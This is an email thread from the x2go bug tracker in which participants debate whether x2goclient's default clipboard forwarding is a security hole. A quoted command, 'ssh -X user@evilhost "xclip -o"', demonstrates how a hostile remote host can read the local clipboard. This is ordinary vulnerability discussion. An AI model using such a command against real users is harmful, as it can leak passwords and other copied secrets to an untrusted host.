From calestyo@scientia.net Mon Jul 1 04:46:32 2013 Received: (at submit) by bugs.x2go.org; 1 Jul 2013 02:46:32 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 469 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 04:46:32 CEST Received: from mailgw01.dd24.net (mailgw01.dd24.net [193.46.215.41]) by ymir (Postfix) with ESMTPS id 319B85DA79 for ; Mon, 1 Jul 2013 04:46:32 +0200 (CEST) Received: from localhost (amavis01.dd24.net [192.168.1.111]) by mailgw01.dd24.net (Postfix) with ESMTP id C88377CC194 for ; Mon, 1 Jul 2013 02:38:43 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw01.dd24.net ([192.168.1.191]) by localhost (amavis01.dd24.net [192.168.1.105]) (amavisd-new, port 10191) with ESMTP id ZbrxJaRO-CAr for ; Mon, 1 Jul 2013 02:38:39 +0000 (GMT) Received: from [192.168.0.102] (host-188-174-220-133.customer.m-online.net [188.174.220.133]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw01.dd24.net (Postfix) with ESMTPSA id E155A7CC16C for ; Mon, 1 Jul 2013 02:38:38 +0000 (GMT) Message-ID: <1372646308.18508.2.camel@heisenberg.scientia.net> Subject: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: submit@bugs.x2go.org Date: Mon, 01 Jul 2013 04:38:28 +0200 Content-Type: text/plain; charset="UTF-8" X-Mailer: Evolution 3.4.4-3 Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Package: x2goclient Severity: grave Tags: security Hi. From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588 It seems that per default (and I even found no way to disable it) x2goclient (and perhaps other related tools?) transmit the content of the clipboard to the remote host. As this may easily contain passwords or other sensitive information, this is a extremely critical hole. Cheers, Chris. From snalwuer@stud.informatik.uni-erlangen.de Mon Jul 1 13:49:57 2013 Received: (at 258) by bugs.x2go.org; 1 Jul 2013 11:49:58 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=URIBL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 361 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 13:49:57 CEST Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103]) by ymir (Postfix) with ESMTPS id AD2895DA79 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 13:49:57 +0200 (CEST) Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90]) by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 739AC6808EE; Mon, 1 Jul 2013 13:43:56 +0200 (CEST) Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763) id 6D466B604D8; Mon, 1 Jul 2013 13:43:56 +0200 (CEST) Date: Mon, 1 Jul 2013 13:43:56 +0200 From: Alexander Wuerstlein To: Christoph Anton Mitterer , 258@bugs.x2go.org Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net> X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory dimona cocaine guantanamo centrifuge holy war pigs mossad nsa X-Echelon-Result: Belligerent User-Agent: Mutt/1.5.21 (2010-09-15) On 13-07-01 04:56, Christoph Anton Mitterer wrote: > Package: x2goclient > Severity: grave > Tags: security > > Hi. > > From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588 > > > It seems that per default (and I even found no way to disable it) > x2goclient (and perhaps other related tools?) transmit the content of > the clipboard to the remote host. Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this. > As this may easily contain passwords or other sensitive information, > this is a extremely critical hole. I disagree, this is not a hole at all, it works as intended. Its just that users are often not educated about the implications of passing around passwords via the clipboard etc. But I concur that the ability to switch off clipboard/selection/... forwarding in the x2goagent/x2goclient would be nice to have. Patches are of course always welcome. Ciao, Alexander Wuerstlein. From calestyo@scientia.net Mon Jul 1 14:51:37 2013 Received: (at 258) by bugs.x2go.org; 1 Jul 2013 12:51:38 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-0.7 required=5.0 tests=RCVD_IN_DNSWL_LOW autolearn=ham version=3.3.2 X-Greylist: delayed 473 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 14:51:37 CEST Received: from mailgw02.dd24.net (mailgw02.dd24.net [193.46.215.43]) by ymir (Postfix) with ESMTPS id 588215DA79 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 14:51:37 +0200 (CEST) Received: from localhost (amavis01.dd24.net [192.168.1.111]) by mailgw02.dd24.net (Postfix) with ESMTP id 324E83569D4 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 12:43:44 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw02.dd24.net ([192.168.1.197]) by localhost (amavis01.dd24.net [192.168.1.105]) (amavisd-new, port 10197) with ESMTP id Khrh8wX8GhAr for <258@bugs.x2go.org>; Mon, 1 Jul 2013 12:43:39 +0000 (GMT) Received: from [10.153.238.27] (unknown [141.84.43.125]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw02.dd24.net (Postfix) with ESMTPSA id 42C8835679C for <258@bugs.x2go.org>; Mon, 1 Jul 2013 12:43:39 +0000 (GMT) Message-ID: <1372682609.25918.14.camel@heisenberg.scientia.net> Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: 258@bugs.x2go.org Date: Mon, 01 Jul 2013 14:43:29 +0200 In-Reply-To: <20130701114356.GP2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> Content-Type: multipart/signed; micalg="sha512"; protocol="application/x-pkcs7-signature"; boundary="=-LTQqmgoTSc45unTPCyxJ" X-Mailer: Evolution 3.4.4-3 Mime-Version: 1.0 --=-LTQqmgoTSc45unTPCyxJ Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote:=20 > Yes, other related tools like X11. x2go is basically just a faster > version of the traditional xforwarding. In X11 every client can always > access the clipboard/selection/etc., so you will also have the same > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' > demonstrates this. Well but that "argument" doesn't really count: 1) Just because others do it plainly insecure, you cannot do it like this as well... like as if Gentoo would say "if Debian breaks their OpenSSL entropy, we should do so, too"... o.O 2) Literally no one who has a decent mind of security, will allow other hosts do directly access their X server.. because then you're (security wise) anyway screwed... And I thought NX would secure what's sent from remote in order to not being able to overtake the input/output devices of the hosts (whole) Xserver). > I disagree, this is not a hole at all, it works as intended. Its just > that users are often not educated about the implications of passing > around passwords via the clipboard etc. Na I disagree... if even people would be educated (which is not realistic) it will happen by accident, that you copy sensitive information... sometimes other programs may do this even automatically and you can't to anything against. Cheers, Chris. --=-LTQqmgoTSc45unTPCyxJ Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgMFADCABgkqhkiG9w0BBwEAAKCCEP4w ggV1MIIDXaADAgECAgMBAYIwDQYJKoZIhvcNAQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4x HjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMg Um9vdDAeFw0xMjA3MjMxNDU2NDVaFw0xNDA3MjMxNDU2NDVaMHwxITAfBgNVBAMTGENocmlzdG9w aCBBbnRvbiBNaXR0ZXJlcjEkMCIGCSqGSIb3DQEJARYVY2FsZXN0eW9Ac2NpZW50aWEubmV0MTEw LwYJKoZIhvcNAQkBFiJtYWlsQGNocmlzdG9waC5hbnRvbi5taXR0ZXJlci5uYW1lMIIBIjANBgkq hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqv+F91K5vyBwiGFMqj6wTehWdqZnfFeXqT8g5b3qrXWL ywSzcoD9xtyoRqAgOCX+PSmBpm6pPhe31VnBtc3HcBMe4rSico9/Z2H9h1l6IMVEnyhabWzoKbE3 BFrsYJGthJCbhK072G8AhCk+5p+L+knLhQXN0Ph7MJbdY26o3M4vjsXFNbJL8TOYxo80cGD1LIh2 SUZFqaIG24TVmTW8F4jD5Z9/NEwJa8kQK+VBNHUntXYNah4Reh0jSsGnq9Pg3Hf4KC+F0IR8QgBm SnwitMFUX9UnhLEvRQxjDI1tm+h6RxfjlV7moI68Ulh7bcdPhM/z2Q16XmaY12rc85pSRQIDAQAB o4IBJjCCASIwDAYDVR0TAQH/BAIwADBWBglghkgBhvhCAQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNl cnRpZmljYXRlIGZvciBGUkVFIGhlYWQgb3ZlciB0byBodHRwOi8vd3d3LkNBY2VydC5vcmcwQAYD VR0lBDkwNwYIKwYBBQUHAwQGCCsGAQUFBwMCBgorBgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgB hvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3Jn MEQGA1UdEQQ9MDuBFWNhbGVzdHlvQHNjaWVudGlhLm5ldIEibWFpbEBjaHJpc3RvcGguYW50b24u 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 +G8T/HNZ92ZCdB6K4/jc0m+YnMtHmJVABfvpAgMBAAGjgb8wgbwwDwYDVR0TAQH/BAUwAwEB/zBd BggrBgEFBQcBAQRRME8wIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLkNBY2VydC5vcmcvMCgGCCsG AQUFBzAChhxodHRwOi8vd3d3LkNBY2VydC5vcmcvY2EuY3J0MEoGA1UdIARDMEEwPwYIKwYBBAGB kEowMzAxBggrBgEFBQcCARYlaHR0cDovL3d3dy5DQWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDAN BgkqhkiG9w0BAQQFAAOCAgEAfwiIodoaUEnaifuhCHLzivcexDq0eVsgMLFF3sJd02Vp8cJdVFQ8 hV+5e0KRwpn9G1Gbq0aloRBTnm2IrHNuLDOm8PSe4HXBPohFqeFmQ/5WWtF6QXj3QNpKOvELW6W7 FgbmwueTuYVNl0+xHjhDgO+bDYzvuKdgAIdXfR5EHMsj75s8mZ2vtSkcRXkWlk0nbfEcbMPCVWSz vBTi86QfHjL8JxUFz90urj6CYXvwIRAY9kTqUzn53NCaIODGu+C7Wk/EmcgHvbW9otsuYg1CNEG8 /4uK9VEiqogwAOKw1Ly+ZbrVA1d5m+jcyE34UO2RpVIooqz7Nlg+6ZQrkVCHG9Ze1ozM9w8QDFJO 0BZh5eUKbL8Xx3JGV5yY9WxgY3pvXrlOL8i5ubtqhbyYDe35PpeENJSuAK+h5eeSbk698+LZFItc 0usBbKAXpS0Q65x6Sr297s797SJAq3A4iPUKh2rCqwVgyUgF2lPB3kR3arPzPDztgLymOEopJF/+ WTubJXpWYwBkuV2kYn1XNk+tg+8fklOgjndX3eVhET0jAJBMPPqjYJMEo6819g5qj09KYKeFBWxG oY/0x3bjoVlX93GyxG4UXG1tQWbfG5Ox1ADD7svPPD0hgKlfY2X83eBfpPQr8IVxQdRnJfsasZeu 1pmCE0HSbqUbmSeA5wupqAAxggLtMIIC6QIBATBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4w HAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJv b3QCAwEBgjANBglghkgBZQMEAgMFAKCCAWMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkq hkiG9w0BCQUxDxcNMTMwNzAxMTI0MzI5WjBPBgkqhkiG9w0BCQQxQgRA5Hr1OF1Te0aKNbEOB2Qi 3EyJC3cLroIt53sI7CUk0KJg5yNqk0/RAAvM2PXl9OmbvnoguNYGbV4S9eVEgQejdTBqBgkrBgEE AYI3EAQxXTBbMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNB Y2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAwEBgjBsBgsqhkiG9w0BCRAC CzFdoFswVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0FjZXJ0 Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAIDAQGCMA0GCSqGSIb3DQEBAQUABIIB AA9NCLSLR8mPUilhhcV8h1w8qBHoKnwfbE7xCfBboUqP04Om8pjq9BbMmv2VQp3Ft02cnLkUhcWb AIWAWc85t0vUPSBOQoCGssY4iM+GQZuQiQ0xBWQzGtEGpw94BwurcYZb88rg5DFF7RK42asqq9Pw NMUE3YiKLp1QFWNnTssl8VQc6zOyAUqT2YbbDjZgnzUxvrm7URXiE9h7+7Xz8w21Q5N1AjA+8aD5 DMJa1MlGplbJS0m4xm4QYwiYPlcUtfvzXFkbVNoy7FepyLScUEyBuU55gCJMEQX9IhCMp4/uhmAQ KMz+7SncbO3zCmlyw4wGVllcI9U1HHjpv/wZybsAAAAAAAA= --=-LTQqmgoTSc45unTPCyxJ-- From snalwuer@stud.informatik.uni-erlangen.de Mon Jul 1 16:01:32 2013 Received: (at 258) by bugs.x2go.org; 1 Jul 2013 14:01:33 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED, URIBL_BLOCKED autolearn=ham version=3.3.2 Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103]) by ymir (Postfix) with ESMTPS id D43925DA79 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90]) by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 7473468098D; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763) id 6B33BB28316; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Date: Mon, 1 Jul 2013 16:01:32 +0200 From: Alexander Wuerstlein To: Christoph Anton Mitterer , 258@bugs.x2go.org Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing Message-ID: <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1372682609.25918.14.camel@heisenberg.scientia.net> X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory dimona cocaine guantanamo centrifuge holy war pigs mossad nsa X-Echelon-Result: Belligerent User-Agent: Mutt/1.5.21 (2010-09-15) On 13-07-01 15:03, Christoph Anton Mitterer wrote: > On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: > > Yes, other related tools like X11. x2go is basically just a faster > > version of the traditional xforwarding. In X11 every client can always > > access the clipboard/selection/etc., so you will also have the same > > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' > > demonstrates this. > Well but that "argument" doesn't really count: > 1) Just because others do it plainly insecure, you cannot do it like > this as well... like as if Gentoo would say "if Debian breaks their > OpenSSL entropy, we should do so, too"... o.O It isn't like that at all, X11 clients and servers have to comply with the respective parts of the protocol. If the protocol demands insecure behaviour, its a design bug, or maybe, like in this case, a compromise nobody likes: Since in X11 clients handle all the shortcuts and mouse button events, since clients or toolkits handle the widgets, the only option to implement C&P is to have clients ask the server for the clipboard or selection contents. Its more a "there is no other way to do it except to make it unusable" kind of problem imho. > 2) Literally no one who has a decent mind of security, will allow other > hosts do directly access their X server.. because then you're (security > wise) anyway screwed... I'm not only talking about 'xhost +' and the like, this would of course be a major problem for more reasons than only the clipboard. And if you wouldn't trust a host with 'ssh -X', then you also shouldn't trust it with x2go. Just think of x2go as a variant of 'ssh -X' with image compression and some extras. X11 protocol firewalling is not really one of those extras. And since the x2goclient will always run in your local X session, it will always be able to read your clipboard. > And I thought NX would secure what's sent from remote in order to not > being able to overtake the input/output devices of the hosts (whole) > Xserver). In a way, yes. Afaik you can avoid certain attacks of the "I'll attach to the root window and get all key events" kind since windowed x2go sessions give you a separate root window. But I imagine there are more problems out there nobody thought of yet. Ciao, Alexander Wuerstlein. From calestyo@scientia.net Tue Jul 2 03:27:57 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 01:27:57 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-0.7 required=5.0 tests=RCVD_IN_DNSWL_LOW autolearn=ham version=3.3.2 Received: from mailgw02.dd24.net (mailgw02.dd24.net [193.46.215.43]) by ymir (Postfix) with ESMTPS id 1E7B15DA79 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 03:27:57 +0200 (CEST) Received: from localhost (amavis02.dd24.net [192.168.1.113]) by mailgw02.dd24.net (Postfix) with ESMTP id E6F213567BF for <258@bugs.x2go.org>; Tue, 2 Jul 2013 01:27:56 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw02.dd24.net ([192.168.1.197]) by localhost (amavis02.dd24.net [192.168.1.106]) (amavisd-new, port 10197) with ESMTP id Xv3AMpvAaOfy for <258@bugs.x2go.org>; Tue, 2 Jul 2013 01:27:50 +0000 (GMT) Received: from [192.168.0.101] (ppp-188-174-36-44.dynamic.mnet-online.de [188.174.36.44]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw02.dd24.net (Postfix) with ESMTPSA id 8CB413566D8 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 01:27:50 +0000 (GMT) Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: 258@bugs.x2go.org In-Reply-To: <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> Content-Type: multipart/signed; micalg="sha1"; protocol="application/x-pkcs7-signature"; boundary="=-UBc+OwvjF5O1EeNaUDsf" Date: Tue, 02 Jul 2013 03:27:49 +0200 Message-ID: <1372728469.11367.26.camel@fermat.scientia.net> Mime-Version: 1.0 X-Mailer: Evolution 2.32.3 --=-UBc+OwvjF5O1EeNaUDsf Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable Hey Alexander. First,... I assume you're one of the NX/X2go developers? On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote: > It isn't like that at all, X11 clients and servers have to comply with > the respective parts of the protocol. If the protocol demands insecure > behaviour, its a design bug, or maybe, like in this case, a compromise > nobody likes: Since in X11 clients handle all the shortcuts and mouse > button events, since clients or toolkits handle the widgets, the only > option to implement C&P is to have clients ask the server for the > clipboard or selection contents. Its more a "there is no other way to do > it except to make it unusable" kind of problem imho. Well first I may have a misunderstanding about how NX works, but more on that below: With respect to the issue (transferring the clipboard) itself: Don't get this in anyway offensive! But I think it's plain simple: It may easily happen that people copy (by intention/accidentally or even automatically by software) stuff to the clipboard which contains sensitive information, which in turn can be anything from passwords to my private love letters ;-) And people don't see x2go (or VNC, or rdp) like a direct access to their X server (as in plain X forwarding with xauth and that like). This might be a misunderstanding... but it's how many similar such "VNC-like" connections (i.e. a screen output into _one single_ X window) work. E.g. when I connect to my qemu virtual machines, I don't have to worry, that the VM can overtake my X server,... the same for Virtualbox... and I hope/believe for VNC/TightVNC/etc. and rdp connections (rdesktop and friends). This includes that users don't expect (or at least they shouldn't have to) that such connections allow wiretapping, e.g. if such a system supports audio forwarding... it shouldn't allow the remote side to activate my MIC and listen to what I say/sing/etc. The same holds true for the clipboard... at least per default it shouldn't be ever sent to the remote side (or vice versa)... and IF one activates it... people should be warned with big warnings what this could mean. That this can indeed lead to compromise showed a recent attack we've had on one our institutes' machines, where sensitive information was caught via an X2go connection and later on used for other attacks. Now for the technical side... admittedly I don't know the details of how NX interacts with X... but there must be some way to achieve blocking of the clipboard sync. Even if the protocol demands to send some content,... well then simply hook in an clear it always (per default). Now more off topic about how NX interacts with X: I understand that NX is not like VNC, where it's more like send the pixbuffers.... and where you obviously have not much security problems in terms of taking over the local X server, since it's more like displaying JPEGS (of course VNC has much other security problems). I haven't found out what RDP actually does... but I'd assume it's rather similar to VNC? Now with NX I understand it's compression at the X protocol level, so "no JPEGs being transferred"... but where do remotes X protocol go to? Directly into the local X? Or is it taken by NX/X2go and rendered as if NX/X2go would be an X server that is displayed in a _single_ window of another one (i.e. like Xephyr)? > And if you > wouldn't trust a host with 'ssh -X', then you also shouldn't trust it > with x2go. Well this is _really_ serious news... So why? I mean that's what most people expect I guess.. like when you connect via ssh, that the remote cannot take over your local system... (unless some serious hole would be find in the ssh client ;) ) > Just think of x2go as a variant of 'ssh -X' with image > compression and some extras. X11 protocol firewalling is not really one > of those extras. And since the x2goclient will always run in your local > X session, it will always be able to read your clipboard. So it directly goes into the local X server? Wow... that's awful... like a security nightmare... > In a way, yes. Afaik you can 